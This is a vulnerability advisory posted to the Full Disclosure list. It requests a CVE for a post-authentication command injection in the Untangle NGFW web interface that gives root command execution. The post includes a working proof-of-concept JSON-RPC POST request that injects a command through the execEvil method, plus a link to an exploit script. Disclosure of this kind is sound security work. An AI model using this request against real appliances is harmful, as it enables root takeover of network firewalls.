[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[fd] CVE ID request: Untangle NGFW <= v12.1.0 post-auth command injection



Product: 

https://www.untangle.com/untangle-ng-firewall/

Description:

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') 

The Untangle NGFW <= 12.1.0 web interface is prone to a command injection vulnerability, allowing non-root users to execute arbitrary commands with root privileges and gain remote shell access to the appliance. 

This vulnerability can be triggered via modifying any request made via functionality accessible from the Network->Troubleshooting->Network Tests window using an intercepting proxy or with otherwise crafted requests to abuse the execEvil() function.

The appliance web interface is accessible via unsecured HTTP by default. This leaves the appliance vulnerable to Man-in-the-Middle attacks that allow attackers to intercept plaintext credentials, facilitating exploitation of this vulnerability for further elevation of privileges.

Solution:

No official solution is currently available. Restrict access, consider Administrator interface access equivalent to root privileges.

Vulnerability Discovery:
Matthew Bush (The Missing Link)

Proof of Concept:
With a local intercepting proxy, alter the "params" field for any POST request to execEvil to execute any arbitrary command (eg, using the Ping Test) once logged in and assigned a nonce value for the session:

---

POST http://192.168.68.154/webui/JSON-RPC HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 99
Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; pysid=ce0629f79bd506f9543381e7eb7d7b7a
Connection: keep-alive
Host: 192.168.68.154

{"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.execEvil","params":["id"]}

---

Exploit:
https://github.com/3xocyte/Exploits/blob/master/untangle-ngfw-12.1-ci.py

Disclosure Timeline:
22/4/2016			Attempted to contact vendor after discovery of vulnerabilities
6/5/2016			No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
12/5/2016			US-CERT confirms contacting vendor
16/6/2016			US-CERT notifies of no response from vendor, suggested requesting CVE-ID via mailing list
27/6/2016 			Public disclosure

Discovery Credit:
Matt Bush (@3xocyte)
The Missing Link (Sydney, Australia)